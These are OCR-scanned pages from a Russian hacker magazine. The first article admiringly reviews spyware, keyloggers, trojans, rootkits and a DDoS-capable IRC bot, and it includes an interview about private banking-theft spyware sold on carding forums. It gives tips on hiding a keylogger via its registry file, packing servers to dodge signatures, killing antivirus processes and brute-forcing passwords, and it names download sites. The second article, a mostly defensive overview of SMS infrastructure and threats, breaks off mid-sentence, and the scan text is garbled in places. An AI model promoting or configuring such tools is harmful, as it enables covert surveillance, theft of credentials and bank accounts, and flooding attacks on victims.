ТЕРАБАЙТЫ В ГЛОБАЛЬНОЙ СЕТИ ТАЯТ 

В СЕБЕ МОЩНОЕ ОРУЖИЕ. НЕУДИВИТЕЛЬНО, 
ЧТО ДАЛЕКО НЕ ВСЯ ОНА ОТКРЫТА. 

А ИНФОРМАЦИЯ, КАК ИЗВЕСТНО, ДОЛЖНА 
БЫТЬ ОБЩЕДОСТУПНА. О ТОМ, КАК СДЕЛАТЬ 
ИНФОРМАЦИЮ ДОСТУПНОЙ, ЧИТАЙТЕ В МОЕМ 
СЕГОДНЯШНЕМ РЕПОРТАЖЕ 


Наумов Юрий aka Сгату_зсирй 
icrazy_script@vr-online.ru 


> разведка боем. Что вообще такое шпионаж? 
Это теория и практика сбора информации о про- 
тивнике для обеспечения безопасности и получе- 
ния преимуществ: сбор и анализ данных из откры- 
тых источников, прослушивание, наблюдение и, в 
конце концов, кража информации. Сейчас SpyWa- 
ге представляет собой не просто ПО для слежения 
за действиями пользователя: на данный момент 
это скорее комплексный проект, состоящий из мо- 
дулей, реализующих множество возможностей, 
умеющих скрываться и определенное время нахо- 
диться в системе незамеченными. Поэтому в этой 


статье я познакомлю тебя с наиболее эффектив- 
ным и качественным на наш взгляд шпионским 
ПО, которое помогает хакерам достигать поста- 
вленных целей и добиться желаемого результата. 
Конечно же, эту информацию мы традиционно 
представляем только для того, чтобы наши чита- 
тели смогли представлять себе источники угрозы 
и эффективно ее локализовывать. 


НИКОЛАЙ «GORL» 
АНДРЕЕВ 
выпускающий редактор 
журнала «Хакер», 
вольный программист. 


Приватный спайвар — 
это в первую очередь 
платный спайвар. И ос- 
новная задача приват- 
ного спайвара, как и 
любого другого платно- 
го продукта, — макси- 
мально полно отвечать 
запросам пользователя 
(то есть, так или иначе, 
хакера). Если пользова- 
телю спайвара требу- 
ются какие-то данные 
— они должны быть 
предоставлены в луч- 
шем и самом полном 
виде. К примеру, обыч- 
ный формграббер, сор- 
цы которого ты без тру- 
да найдешь в Сети, не 


Ну, это смотря кто ав- 
тор. Кто-то для обхода 
файрволов пользуется 
инжектом, миллион раз 
всеми описанным, а 
кто-то в состоянии на- 
писать свой транспорт- 
ный уровень для винды, 


Стоимость разная. У по- 
пулярных (если так мож- 
но выразиться) приват- 
ных троянов цена колеб- 
лется от тысячи до трех 


SPE@QraAtMHEHMUE 


ВОЗМОЖНОСТИ... 


сможет предоставить 
всю информацию о 
банковском аккаунте 
жертвы. Банальная за- 
щита TAN'om не даст 
хакеру воспользовать- 
ся чужими деньгами. 

А приватный софт, на- 
писанный специально 
для воровства банк-ак- 
каунтов, посредством 
нехитрых манипуляций 
с Пр-трафиком без 
труда предоставит вни- 
манию своего владель- 
ца и пароль, и логин, и 
ТАМ, и даже текущий 
баланс жертвы. Вот что 
значит — сервис. Логи 
подобных программ до- 


А КАК ОТНОШЕНИЯ С АНТИВИРУСАМИ И ФАЙРВОЛАМИ? 
ПРОАКТИВНАЯ ЗАЩИТА ОТДЫХАЕТ? 


чтобы ни один сетевой 
фильтр вообще не ви- 
дел сетевого трафика 
спайвара. Правда, сто- 
имость подобной техно- 
логии — просто огром- 
ная. На любую появля- 
ющуюся защиту у про- 


тысяч долларов за ском- 
пиленную копию (дело 
прибыльное, но уголов- 
но наказуемое). Прода- 
ется подобный софт на 


роже золота. Нужны па- 
роли от почты? Публич- 
ный софт будет рыться 
в реестре и куче фай- 
лов, в результате чего 
не факт, что даст хотя 
бы пароль от Outlook 
«такой-то версии» и 
The Bat! не старше 3.5. 
Платный же продукт 
просто отснифает всю 
необходимую информа- 
цию, и никакие новые 
версии (с «новой крип- 
тографической систе- 
мой хранения паро- 
лей») ему не страшны. 
Если в целом — воз- 
можности у платного 
спайвара любые, веро- 


фессионального спай- 
вар-кодера всегда най- 
дется достойный стоты- 
сячного ботнета ответ. 
А вообще антивируса- 
ми пользуется очень 
маленький процент 
пользователей интере- 


специализированных 
закрытых кардерских 
форумах. Чтобы туда 
попасть, нужно найти 2- 
3 человек с этого фору- 


ЧТО ПРЕДСТАВЛЯЕТ СОБОЙ СОВРЕМЕННЫЙ ПРИВАТНЫЙ СПАЙВАР? Я ИМЕЮ ВВИДУ, 
КОНЕЧНО ЖЕ, ФУНКЦИИ, РАЗМЕРЫ, 


ятно, даже такие же, 
как и в публичном соф- 
те, но на порядок каче- 
ственнее, а, следова- 
тельно, доходнее. 
Размеры? Да кого 
они волнуют! Все равно 
при загрузках спайвар- 
софта на компьютер 
жертвы используется 
специальный лоадер. 
Сколько надо — столь- 
ко и загрузит. Однако 
ребята, пишущие троя- 
ны — не лохи, у них все 
равно получаются ма- 
ленькие и аккуратнень- 
кие программы — прог- 
рамм больше 40Кб я 
просто не видел. 


нета, и на борьбу с ни- 
ми, конечно, заморачи- 
ваются, но не так, чтобы 
очень серьезно. Часто 
просто ограничиваются 
отсутствием в собствен- 
ном коде сигнатур, зна- 
комых антивирусам. 


А ЧТО ЖЕ НАСЧЕТ СТОИМОСТИ? ГДЕ ДОБЫВАЮТ СВЕЖАЧОК, И КАК В ЭТУ ТУСОВКУ ВЛИВАЮТСЯ 
ЛЮДИ С УЛИЦЫ? МОЖЕТ БЫТЬ, НАДО СОВЕРШИТЬ КАКОЙ-ТО НАСТОЯЩИЙ МУЖСКОЙ ПОСТУПОК? 


ма, которые могут за 
тебя поручиться (что ты 
He федерал, не авер и, 
вообще, не дятел), и до 
$50 в месяц за членство. 
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Midday 
Sausages 1.0 


нее 


http://rst.void.ru 


Отличный инструмент 
для обживания взло- 
манной тачки от отече- 
ственного производи- 
теля. Небезызвестная 
RusH Security Team 
«собрала» собствен- 
ный руткит из самых- 
самых, на их взгляд, 
программ для сбора 
информации. В состав 
входит около 30 ути- 
лит, большинство из 
которых транспортиро- 
ваны из ипх-систем. 
Данные о каждом из 
них ты сможешь найти 
в архиве (midday_sau- 
sages.txt). 

Отличным предста- 
вителем набора явля- 
ется старый кейлоггер 
IKS (Invisible Keylogger 
Stealth). Он устанавли- 
вается как драйвер 
устройства и ввиду это- 
го с трудом выявляется 
в системе. Для более 
эффективного скрытия 
шпиона советую попра- 
вить iks.reg, так или 
иначе участвующий в 
установке. Особо мно- 
го менять не придется: 
DisplayName (имя в ре- 
естре, можно любое), 
LogName (путь к файлу 
логов). При желании 


т” 
| Г мыс аа кан 


| Г меб ами 


| 
| 
| 
о ый 


ыы 
7 авары 
Toor te Той Оф. 
Г С Dieser Lg Lipari I et 


Г И ona Cee armed Ру OF Chae Teed Log mi 


можно поменять и имя 
файла-драйвера. На- 
стройка просмотра ло- 
гов осуществляется с 
помощью фильтров. В 
readme есть инструк- 
ция по установке кей- 
логгера (как с правами 
рута так и без них) и 
работе с ним. 

Есть в наборе еще 
одна очень полезная 
вещица — утилита 
enum от группы Razor. 
Программа отличается 
своей универсально- 
стью: автоматизирует 
установку и разрыв ну- 
левого соединения, 
предоставляет данные 
о политике паролей и 
даже дает возмож- 
ность выяснить пароль 
какой-нибудь слабоза- 
щищенной записи. А 
при использовании па- 
раметров «-D -и <login> 
-f <file_passwd>» мо- 
жет даже подобрать 
удаленный пароль. Для 
извлечения информа- 
ции через нулевое сое- 
динение проще всего 
заюзать утилиту nete 
от Cult Death Cow. 

Ho вот условия pa- 
боты с руткитом оста- 
вляют желать лучшего. 
Во-первых, дело, ко- 
нечно, в размере. Весит 
все это добро в распа- 
кованном виде около 
8 Мб (в архиве 2.7 Мб). 
Во-вторых, это скры- 
тие инструмента в си- 
стеме. Автор предлага- 
ет лишь вариант attrib 
+h. Ну, конечно если он 
тебя устраивает, соси- 
ски придутся по вкусу. 
Пакет программ можно 
всегда взять с сайта 
команды: rst.void.ru. 
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CIA 1.3 
rat 


Многофункциональный 
и сравнительно свежий 
троян, написанный на 
VB хакером по имени 
Alchemist. Тулза функ- 
циональна, красива, 
удобна, поддерживает 
плагины, скрипты и да- 
же скины :). Файл сер- 
вера пакуется спе- 
циальной утилитой 
mew by Northfox (north- 
fox.uw.hu) и становится 
примерно втри раза 
компактнее. Таких ре- 
зультатов помогает до- 
биться Open source ал- 
горитм шифрования 
LZMA (используется в 
7-Zip). Я попытался 3a- 
паковать один и тот же 
сервер другими утили- 
тами (ASPack, PECom2, 
UPX), и не один из них 
не сделал это лучше. О 
более качественной 
шифровке с помощью 
mew читай в статье 
«Обман Ре или скры- 
ваем сигнатуру MEW» 
на www.team-x.ru. 

Если все же тебя 
что-то не устраивает, и 
есть желание добавить 
к своему оружию еще 
пару других фишек, мо- 
жешь приджойнить 
свою личную утилиту к 
серверу. При запуске 
программы она будет 
копироваться и запу- 
скаться по твоему усмо- 
трению (Build Server > 
Binder). Способ этот He- 
эффективен потому, 
что исчезает одно из 
преимуществ крысы — 
размер. Но все проду- 
мано — есть еще пара 
способов оттюнинго- 
вать CIA под себя. Пер- 
вый — дать трою зада- 


чу скачивать файлы из 
Сети (при этом есть 
поддержка socks) и 
сохранять их куда душа 
пожелает. Второй спо- 
соб более приятный и 
открывает хакеру сам- 
ое главное — путь к 
творчеству :). Да-да, 
это те самые плагины, 
которые можно писать 
самому на VB. Причем 
в комплект троя входит 
несколько готовых пла- 
гинов, пара примеров, 
а так же небольшая до- 
кументация по написа- 
нию. Если нужно, пла- 
гины уже будут закачи- 
ваться на сервер. Мож- 
но включить хоть 100 
плагинов, а использо- 
вать только 5 — размер 
все равно останется 
прежним. 

Без сомнения, функ- 
циональность троя вну- 
шает уважение, но тул- 
за этой категории будет 
бесполезна, если она 
не умеет грамотно 
скрыться в системе. 
CIA умеет многое... 
Например, спрятаться 
от диспетчера задач 
и практически мгновен- 
но (примерно в течение 
2 секунд после запуска) 
зашифроваться от 
грозного РЕ. При жела- 
нии в настройке серве- 
ра можно дополнитель- 
но указать список про- 
цессов, подлежащих 
скрытию. Это актуаль- 
но при использовании 
сторонних утилит. А как 
же быть с антишпион- 
ским ПО, спросишь ты? 
Эта проблема решает- 
ся путем убийства про- 
цессов. Просто вводим 
название процесса (без 
расширения) и добав- 
ляем в список (Build 
Server — Firewall Killing). 
Разработчик заморо- 
чился и собрал файл со 
списком самого извест- 
ного анти-ПО размером 
почти в 500 записей. 
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Penumbra 1.7.2 


Прекрасный трой от 
корейских хакеров с 
отличными методами 
невидимости. В отли- 
чие от своих коллег, 
сумел скрыться не 
только от Windows 
Task Manager: Process 
Explorer так же ничего 
не показал. Бэкдор 
проникает в систему 
путем внедрения в 
определенный про- 
цесс. Мне пришлось 
удалять клиент через 
запущенный сервер, 
который, кстати, вну- 
шительных размеров: 
в незапакованном виде 
весит около 370Kb. 


Ч Ок шум 
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KGB KeySpy 2.0 


В плане функциональ- 
ности трой скорее усту- 
пает предыдущему при- 
меру, хотя предоста- 
вляемых инструментов 
должно вполне хватить 
для осуществления 
большинства целей: 
сбор информации о си- 
стеме, о процессах, за- 
пуск программ, а так же 
лог введенных паролей, 
начиная от ехрюгега 
и заканчивая winrar'om. 
В любой момент можно 
снять скрин экрана, но, 
в отличие от СИА, только 
одной картинкой. 
Конфигурауция эк- 
зешника сервера осу- 
ществляется через кли- 
ент и не представляет 
из себя ничего особен- 
ного, разве что только 
выбор метода работы в 
системе. Либо трой бу- 
дет работать как от- 
дельный процесс (имя 
и описание которого 
указывается при кон- 
фигурации сервера), 
либо будет производит- 
ся инклуд в любой уже 
существующий. 


Хороший клавиатур- 
ный шпион от ныне не- 
существующей коман- 
ды Blacklogic. Много- 
кратные посты на фо- 
румах и новости с по- 
ложительными отзыва- 
ми от небезызвестных 
личностей вызывали 
неподдельный интерес 
к этой тулзе. К насту- 
плению 2005 года мем- 
беры решили сделать 
подарок — пустили та- 
ки ранее приватный 
кейлоггер в массы. 
Тулза, написанная 
полностью на ассем- 
блере, вышла удобной, 
простой, а главное — 
эффективной. И сей- 
час, спустя 2 года шпион 
не потерял свой запал. 
Настройка сервера не 
потребует высокой ум- 


ственной деятельно- 
сти: указание параме- 
тров smtp-cepBepa, ду- 
маю, не составит осо- 
бого труда. В итоге — 
получается 9-ти кило- 
байтовый разведчик. 
Лог ведется с уче- 
том регистра, приняти- 
ем русского языка и 
указанием окна-источ- 
ника с ответственно- 
стью и надежностью 
настоящего агента со- 
ветских времен, при- 
чем перед отправкой 
особо секретной ин- 
формации к хакеру на 
мыло, КГБ'эшник пред- 
варительно зашифрует 
и запакует лог. Для 
расшифровки исполь- 
зуется утилита, входя- 
щая в комплект 
(ипраск*.ехе). 
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Illusion 
Security Bot 


private ($400 


На закуску я решил 
рассказать тебе о при- 
ватном инструменте — 
боте со встроенным 
бэкдором и возможно- 
стью его администри- 
рования как через irc- 
сеть, так и через web- 
интерфейс. Причем при 
конфигурации работы 
можно указывать сразу 
два сервера, на случай 
если один из них ока- 
жется нерабочим. 
Животное натрени- 
ровано для выживания 
в особо трудных усло- 
виях: драйвер уровня 
ядра, который скрыва- 
ет как бота, так и само- 
го себя, также скрыва- 
ет процесс и запрещает 
его убийство. Если 
пользователь работает 
без прав администрато- 
ра, и установить драй- 
вер не удается, можно 
провести инжект в дру- 
гой процесс. Эти аспек- 
ты делают стелсирова- 
ние бота в системе мак- 
симально успешным. 
Чисто шпионские 
качества бота помогут 
атакующему получить 
наиболее полную, а 
главное — достоверную 
информацию как о же- 
лезе (проц, память), так 
и о системе. Причем 
версией ОС и датой на 
удаленной тачке спи- 
сок не заканчивается. 
Наиболее полная ин- 
формация о дисках, 
процессах и установ- 
ках ОС отрисуют поло- 
жение дел на удален- 
ной тачке еще полнее 
и содержательнее. За- 
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одно ты сможешь ли- 
цезреть и текущие на- 
стройки самого бота, 
его задания (многоза- 
дачность реализована 
на высоте!), конфиг, на- 
стройки флуда. Кстати, 
флуд — одно из глав- 
ных его оружий: SYN, 
ICMP (как со спуфены- 
ми IP, так и без них), 
UDP, HTTP GET — все, 
что душе угодно! 

Само собой, при 
управлении этим зве- 
рем через irc принима- 
ются соответственные 
меры безопасности. 
Для подчинения себе 
бота на канале нужно 
залогиниться коман- 
дой !login [passwd]. При 
этом для скрытия паро- 
ля от чужих глаз ис- 
пользуется функция 
md5crypt. Ввиду этого 
необходимость вво- 
дить пароль отпадает 
сама собой. Вместо 
этого для идентифика- 
ции хозяина будет ис- 
пользоваться хэш, по- 
лучившийся с учетом 
nicklident @ address в irc 
и пароля. Понятно, что 
теперь никому этот 
хэш не поможет, т.к. 
ident и address у кого- 
либо — другие. 

Конечно, все это не 
может не вызывать ап- 
петита. Но такова суть 
приватных тулз: либо 
плати деньги, либо жди, 
когда инструмент ста- 
нет уже не таким акту- 
альным. А сейчас ав- 
тор гарантирует новую 
версию бота, если тот 
все же где-то спалится. 
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Pinch 2 Pro 


www.xroot.hut1.ru 


Довольно таки ста- 
ренькая разработка от 
cobanz2k, хорошо из- 
вестного в сфере ICQ- 
хакинга, который, кста- 
ти, писал в наш журнал 
о паролях и их добыче 
(Х$11(48)). Кстати, бу- 
дет нелишним перели- 
стать этот мегаполез- 
ный спецвыпуск. 

Так почему настоль- 
ко старый трой попал в 
наш обзор? Во-первых, 
дело в том, что троян 
этот шароварный, иу 
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меня была лишь Bep- 
сия 2.58. На момент на- 
писания статьи послед- 
ним выпуском была 
версия 2.95 за май это- 
го года. Во-вторых, это, 
наверное, самый «па- 
рольный троян». В пла- 
не воровства паролей 
это один из лучших 
представителей семей- 
ства трояновых: начи- 
ная от аськи и почты, 
заканчивая Far'om и 
TotalCmd. Забрать па- 
роли и добытую инфор- 
мацию можно посред- 
ствам мыла, а точнее 
smtp-cepBepa или с по- 
мощью http. Причем 
второй способ несом- 
ненно эффективнее: 
отправка информации 
не только происходит 
без участия smtp, но и 
минуя firewall. Все па- 
роли высылаются од- 
ним файлом, по жела- 
нию могут шифровать- 
ся. Подробнее о том, как 
скрыть трой, читай на 
www.xakep.ru/post/23566/. 
В некоторых слу- 
чаях может пригодить- 
ся способ управления 
жертвой через IRC. Па- 
раметры подключения 
бота к серверу на- 
страиваются при ком- 
пиляции. Управление 
происходит путем от- 
сылки сообщений боту. 


> fallback! Bce эти кейлоггеры, бэкдоры, рутки- 
ты — отличные инструменты. И суть не в том, при- 
ватные они или публичные, и не в том, палятся ли 
они современными антивирусами или нет. Если 
мозг работает плохо — никакие приватные бэкдо- 


ры и руткиты не помогут © 


wwws.ca.com/securityadvisor/pest — 
отличная энциклопедия Spyware 


www.research.sunbelt-software.com — 
неплохой архив описаний шпионского ПО 


www.simovits.com/trojans — 
внушающий список информации о зло-программах 


На нашем СО ты сможешь найти видео по работе 
с приватным Illusion Security Bot 


Данная сатья написана исключительно в образовательных 
целях, Автор и редакция не несут ответственности 

за незаконное применение программного обеспечения 
представленного в обзоре. 


ECNU при нажатии 
на кнопку двигатель 
не завелся - срочно 
купите журнал! ммм 
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смертельная 
мобильность 


SMS СПАМ 


ПРОВОЗГЛАШЕННОЕ НЕСКОЛЬКО ЛЕТ НАЗАД КОМПАНИЕЙ PEPSI-COLA «ПОКОЛЕНИЕ NEXT» 
УЖЕ УСПЕЛО СТАТЬ «КОРОЧЕ» И ПРЕВРАТИТЬСЯ В «ПОКОЛЕНИЕ SMS». ВСЕ ВОКРУГ 

ОСТЕРВЕНЕЛО НАЖИМАЮТ НА КНОПКИ МОБИЛЬНОГО ТЕЛЕФОНА, ОТСЫЛАЯ И ПРИНИМАЯ 
КОРОТКИЕ СООБЩЕНИЯ ОТ СВОИХ ДРУЗЕЙ И ПОДРУГ, А ТАКЖЕ УЧАСТВУЯ В $М$-ИГРАХ И 


Мобильные операторы делают очень неплохие день- 
ги, играя на чувствах и современных тенденциях. Но 
там, где крутятся большие деньги, сразу появляются 
желающие поживиться. И технология SMS автома- 
тически тянет за собой определенные проблемы. 

> — как работает SMS. Существует 3 способа no- 
слать короткое сообщение на мобильный телефон: 


“ С ДРУГОГО МОБИЛЬНОГО ТЕЛЕФОНА. 
™ ЧЕРЕЗ ШЛЮЗ (E-MAIL, WEB, SKYPE И Т.Д.). 


— ЧЕРЕЗ ТАК НАЗЫВАЕМЫЙ ESME 
(EXTERNAL SHORT MESSAGE ENTITY) — 
ВНЕШНИЙ ГЕНЕРАТОР SMS-KOHTEHTA, 
В КАЧЕСТВЕ КОТОРОГО МОЖЕТ 
ВЫСТУПАТЬ СИСТЕМА УВЕДОМЛЕНИЙ 
О ПОСТУПЛЕНИИ ГОЛОСОВОЙ ИЛИ 
ОБЫЧНОЙ ПОЧТЫ, СИСТЕМА 
ИНФОРМИРОВАНИЯ (НАПРИМЕР, 

О КУРСЕ ДОЛЛАРА ИЛИ ПОГОДЕ) 
И СИСТЕМА ДОСТАВКИ НОВЫХ 
ПРОГРАММНЫХ ПРИЛОЖЕНИЙ. 


Каким бы способом ты не отсылал сообщение, оно 
сначала поступает в центр SMS (SMS Centre, SMSC), 
который поддерживается мобильным оператором (в 
зависимости от масштаба оператора, таких центров 
у него может быть несколько). Затем происходит 
первичная обработка полученного сообщения, его 
конвертация в $М$-формат и передача в очередь на 
отправку. Так как абоненты мобильны и могут пере- 
мещаться по всему миру, то необходимо определить 
местоположение абонента, что делается с помощью 
запроса к базе HLR (Home Location Register). Если 
получатель в данной момент «вне зоны действия 
сети», то сообщение помещается в буфер ожида- 
ния. В противном случае получаем адрес центра 
коммутации (Mobile Switching Center, MSC), кото- 
рый обслуживает в данный момент абонента. По- 
сле получения 5М$-сообщения MSC запрашивает 
информацию о получателе, это делается через ба- 
зу VLR (Visitor Location Register) — локальный ва- 


АКЦИЯХ 


lalukatsk @ cisco.com| 


риант HLR, который хранит информацию о времен- 
ных (роуминговых) абонентах. Наконец, М$С пере- 
дает сообщение на базовую станцию (base station, 
BS), ата, «по воздуху», — до мобильного телефона. 
Это та схема, которая лежит «на поверхно- 
сти». Однако за этой простотой и логичностью 
скрывается достаточно сложная система сигнали- 
зации, контроля и управления, которая и обеспе- 
чивает работоспособность всего механизма. 
> немного о внутренностях. Например, как 
обеспечить передачу SMS абоненту, который по- 
стоянно находится в движении? Раньше для этой 
цели абонент должен был сам регистрироваться в 
зоне действия другого оператора, что было крайне 
неудобно. Позже для решения этой задачи разрабо- 
тали специальный механизм, который автоматизи- 
ровал эту рутинную задачу. Это 1$-41 (ANSI-41) для 
североамериканских мобильщиков, ANSI-136 для 
AMPS и IS-95 для СОМА. В @$М-сетях аналогичную 
роль выполняет протокол MAP (Mobile Application 
Part). Именно он определяет методы и механизмы 
взаимодействия мобильных сетей. МАР, наряду с 
другими протоколами, входит в стек системы сигна- 
лизации OKC7 (SS7), которая разрабатывалась для 
контроля телефонных сетей, и является транспорт- 
ной системой для передачи сообщений SMS. 
Передача сообщения реализуется с помо- 
щью протокола ТСАР (Transaction Capabilities Ap- 
plication Part), который, в свою очередь, использу- 
ет для передачи комбинацию двух протоколов — 
подсистему SCCP и MTP. Протокол Signaling Соп- 
nection and Control Part (SCCP) предназначен для 
обеспечения передачи SMS от узла к узлу. OH обес- 
печивает связь через несколько узлов (иными сло- 
вами, организует некоторое виртуальное соедине- 
ние) и управление передачей сообщений. А ниже- 
лежащий протокол МТР перед этим позволяет удо- 
стовериться, что связь между узлами возможна. 


ПЕРВОЕ КОММЕРЧЕСКОЕ $М$-СООБЩЕНИЕ БЫЛО ПОСЛАНО 
3 ДЕКАБРЯ 1992 ГОДА В АНГЛИИ С ПЕРСОНАЛЬНОГО КОМПЬЮТЕРА 


ЧЕРЕЗ ОПЕРАТОРА VODAFONE 
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На участке от ESME до SMSC используется стек 
протоколов IP, а вот дальше передача SMS осу- 
ществляется уже по OKC7. Для взаимодействия 
IP-cetu с OKC7 используется специальное устрой- 
ство — Signaling Transfer Point (STP), выполняющее 
ту же роль, что и обычный маршрутизатор B IP-ceTAX. 

Взаимодействие с SMSC происходит по од- 
ному из 5-ти протоколов: 


“ SMPP (SHORT MESSAGE PEER-TO-PEER) — 
ЕДИНСТВЕННЫЙ ОТКРЫТЫЙ СТАНДАРТ 
И НАИБОЛЕЕ ЧАСТО ИСПОЛЬЗУЕМЫЙ 
ПРОТОКОЛ. ТЕКУЩАЯ ВЕРСИЯ 
ПРОТОКОЛА — 5.0, НО НАИБОЛЕЕ 
ЧАСТО ИСПОЛЬЗУЕТСЯ ВЕРСИЯ 3.4 
(ВЕРСИЯ 4 БЫЛА СПЕЦИАЛЬНО 
РАЗРАБОТАНА ДЛЯ ЯПОНСКОГО РЫНКА). 


— ЕМИОСР (EXTERNAL MACHINE 
INTERFACE/UNIVERSAL COMPUTER 
PROTOCOL) — СОБСТВЕННЫЙ 
ПРОТОКОЛ LOGICACMG, БАЗИРУЮ- 
ЩИЙСЯ НА СТАНДАРТЕ ETSI UCP. 


™ CIMD2 (COMPUTER INTERFACE 
TO MESSAGE DISTRIBUTION) — 
СОБСТВЕННЫЙ ПРОТОКОЛ NOKIA. 


™ 01$ (OPEN INTERFACE SPECIFICATION) — 
СОБСТВЕННЫЙ ПРОТОКОЛ SEMA GROUP 
(СЕЙЧАС — SCHLUMBERGERSEMA). 


— TAP (TELOCATOR ALPHANUMERIC 
PROTOCOL) — ПРОТОКОЛ, ПРЕДНАЗНА- 
ЧЕННЫЙ ДЛЯ ПЕРЕДАЧИ СООБЩЕНИЙ 
МЕЖДУ $М$-ПРОВАЙДЕРАМИ 
И ПЕЙДЖИНГОВЫМИ КОМПАНИЯМИ В США. 


Купить собственный SMSC не каждому мобильно- 
му оператору по карману, поэтому их часто берут в 
аренду или пользуются аутсорсинговыми услугами 
более крупных «коллег». В мире существует мно- 
жество разработчиков SMSC — Comverse, Nokia, 
Unisys, Airwide, Jinny, Motorola и другие. Но самым 
известным разработчиком, чьи решения использу- 
ются по всему миру, является LogicaCMG (резуль- 
тат слияния двух компаний — Logica и CMG). 
> 4To Takoe SMS. На самом деле, SMS — это не 
только текст, который ты привык получать от своих 
друзей. Короткое сообщение может также содер- 
жать двоичные данные, такие как мелодии (ringtone) 
и логотипы/картинки. Длина обычного текстового 
сообщения не может превышать 160 символов ла- 
тинского алфавита (в 7-битной кодировке). Для дру- 
гих алфавитов, в том числе и русского, длина сооб- 
щения не может превышать 70 символов. Если сооб- 
щение содержит больше знаков, то обычно оно раз- 
бивается на несколько частей. Для передачи рингто- 
нов используется 8-битная кодировка, и максималь- 
ная длина сообщения составляет 140 символов. 

Но это еще не все. Тем, кто занимается ад- 
министрированием сетевого оборудования, зна- 
ком протокол ТЕТР, используемый для обновле- 


ния настроек и ПО маршрутизаторов или комму- 
таторов. Аналогичный механизм существует и 
для мобильных телефонов. Он носит название 
Over-the-air programming (OTA), over-the-air service 
provisioning (OTASP) или over-the-air parameter ad- 
ministration (OTAPA). Ero задача — «залить» на 
телефон новую версию прошивки, софта или про- 
вести диагностику устройства. Для этого абонент 
должен позвонить на определенный номер (кото- 
рый обычно рассылается через SMS) и получить 
все необходимое для улучшения характеристик 
телефона. 

> = обугрозах. Их достаточно много: 


— АТАКИ НА ESME; 
— SMS-CNAM; 

— ЛОКАЛЬНЫЙ И ГЛОБАЛЬНЫЙ SMS-DOS; 
— $М5$-ВИРУСЫ. 


> = угрозы и защита ESME. Чтобы посылать SMS 
через $М$С оператора, можно пойти двумя путями: 


1 ИСПОЛЬЗОВАТЬ ШЛЮЗ WEB-SMS. 


2 ИСПОЛЬЗОВАТЬ СПЕЦИАЛЬНОЕ 
ПО И ПРЯМОЕ СОЕДИНЕНИЕ С $М$С 
(НАПРИМЕР, ПО ПРОТОКОЛУ $МРР). 


В обоих случаях добропорядочный контент-про- 
вайдер выступает в качестве ESME и должен 3a- 
ключить договор с мобильным оператором, после 
чего ему выделяют учетную запись и сообщают 
все параметры подключения (идентификатор ES- 
МЕ, пароль на подключение ит.д.). 

Если ты решил подключиться через web- 
шлюз, то тебе дают ссылку, при обращении к кото- 
рой с определенными параметрами ты можешь 
отправлять SMS’ku. В качестве таких параметров 
можно указывать номер отправителя и получате- 
ля, срок отправки сообщения и длительность ожи- 
дания (если абонент не доступен). И у злоумы- 
шленника есть 2 возможности «пошалить» — по- 
добрать пароль к сайту и отсылать SMS под чужой 
учетной записью, либо подменять адрес отправи- 
теля сообщения в скрипте. 

Во втором случае (прямое ЗМРР-подключе- 
ние) ситуация также далека от идеальной — под- 
ключение к SMSC в большинстве случаев осу- 
ществляется без какой-либо защиты, и перехват 
System-ID, System-Password, System-Type позво- 
ляет злоумышленнику маскироваться под легит- 
имного контент-провайдера. 

Возможна и третья ситуация, с которой бо- 
роться сложнее всего. SMS-yrpo3y несет сам кон- 
тент-провайдер, который желает извлекать выго- 
ду любыми способами. По большому счету, сегод- 
ня договор на оказание контент-услуг с мобиль- 
ным оператором может заключить любой желаю- 
щий, ведь для оператора это дополнительный ис- 
точник дохода. И разбираться с нарушителями он 
будет только в случае систематических звонков в 


службу поддержки со стороны разъяренных кли- 
ентов. А так как последние не очень любят зво- 
нить по «горячему» номеру, то злоумышленник 
может чувствовать себя вполне спокойно. Зача- 
стую в службу поддержки оператора вообще не 
дозвонишься — постоянно включается автоответ- 
чик. Надо признать, что такая ситуация действует 
и для УР-клиентов, которые редко когда могут до- 
звониться до персонального менеджера. 

Средства защиты в данном случае достаточ- 
но очевидны: 


—` ЗАЩИТА М/ЕВ-ШЛЮЗА ОТ АТАК 
С ПОМОЩЬЮ ТАК НАЗЫВАЕМОГО 
APPLICATION FIREWALL, КОТОРЫЙ 
ПОДНИМАЕТСЯ С СЕТЕВОГО 
НА ПРИКЛАДНОЙ УРОВЕНЬ, И ПОНИМАЕТ 
СПЕЦИФИКУ МЕВ-ПРИЛОЖЕНИЙ. 


—` ИСПОЛЬЗОВАНИЕ «ЧЕРНОГО» 
И «БЕЛОГО» СПИСКОВ IP-AQPECOB ESME. 


—` АУТЕНТИФИКАЦИЯ СОЕДИНЕНИЯ 
SMSC-ESME С ПРИМЕНЕНИЕМ 
ЦИФРОВЫХ СЕРТИФИКАТОВ. 


—` ШИФРОВАНИЕ СОЕДИНЕНИЯ МЕЖДУ 
SMSC И ESME. 


—` ГРАМОТНАЯ ПРОРАБОТКА ДОГОВОРА 
С КОНТЕНТ-ПРОВАЙДЕРАМИ. 
В ПРОТИВНОМ СЛУЧАЕ ТЫ НЕ СМОЖЕШЬ 
ОТКЛЮЧИТЬ ЕГО ЗА ОБНАРУЖЕННЫЕ 
НАРУШЕНИЯ. В США БЫЛО НЕСКОЛЬКО 
ИНЦИДЕНТОВ, КОГДА МОБИЛЬНЫЕ 
ОПЕРАТОРЫ СТРАДАЛИ ОТ ТОГО, 
ЧТО ESME РАССЫЛАЛИ ЧЕРЕЗ НИХ 
МОБИЛЬНЫЙ СПАМ. РАЗОРВАТЬ 
КОНТРАКТ ОНИ НЕ МОГЛИ, Т.К. СПАМ 
НЕ БЫЛ УКАЗАН В ПРИЧИНАХ 
ВОЗМОЖНОГО ДОСРОЧНОГО 
РАСТОРЖЕНИЯ ДОГОВОРА, А ОТКАЗ 
ОТ ПЕРЕСЫЛКИ СПАМА ТАКЖЕ БЫЛ 
НЕВОЗМОЖЕН — ЗА НАРУШЕНИЕ SLA 
ОПЕРАТОР ВЫНУЖДЕН БЫЛ ПЛАТИТЬ 
«КРУГЛЕНЬКУЮ» СУММУ. 


> — ЭМ5$-спам. У SMS-cnama есть две стороны 
медали. Посылка назойливых сообщений, не тре- 
бующих никакой реакции от пользователя и вызы- 
вающих только раздражение. И посылка сообще- 
ний, ответная реакция на которые (послать обрат- 
но SMS или позвонить на платный номер) обхо- 
дится абоненту в копеечку. 

Выгоден ли спам? Да. Согласно одному из 
расчетов, отправка 100000 $М$-сообщений с про- 
сьбой обратного звонка на платный номер дает 
спамерам доход в размере 10350 евро. Десяти- 
кратное увеличение числа спама также увеличи- 
вает и доход — до 103500 евро. Помимо этого 
и сам оператор несет потери. 

Например, возьмем следующие исходные 
данные: 


